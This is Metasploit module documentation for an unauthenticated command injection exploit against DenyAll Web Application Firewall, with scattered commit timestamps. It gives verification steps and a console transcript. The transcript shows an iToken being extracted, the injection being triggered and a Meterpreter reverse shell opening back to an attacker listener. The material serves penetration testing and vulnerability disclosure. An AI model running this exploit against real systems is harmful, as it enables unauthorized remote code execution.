2017-09-19 14:53:37 +03:00
## Vulnerable Application
2017-09-21 23:48:12 +03:00
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
2017-09-19 14:53:37 +03:00
It's possible to have trial demo for 15 days at Amazon Marketplace.
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911 ](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911 )
You just need to follow instruction above URL.
## Verification Steps
A successful check of the exploit will look like this:
2017-09-21 23:48:12 +03:00
- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify ** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify ** that you are seeing `iToken` value extraction.
- [ ] **Verify ** that you are getting `meterpreter` session.
## Scenarios
2017-09-19 14:53:37 +03:00
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
2023-10-10 14:46:18 -04:00
[*] Triggering command injection vulnerability with iToken value.
2017-09-19 14:53:37 +03:00
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
2017-09-21 23:48:12 +03:00
```
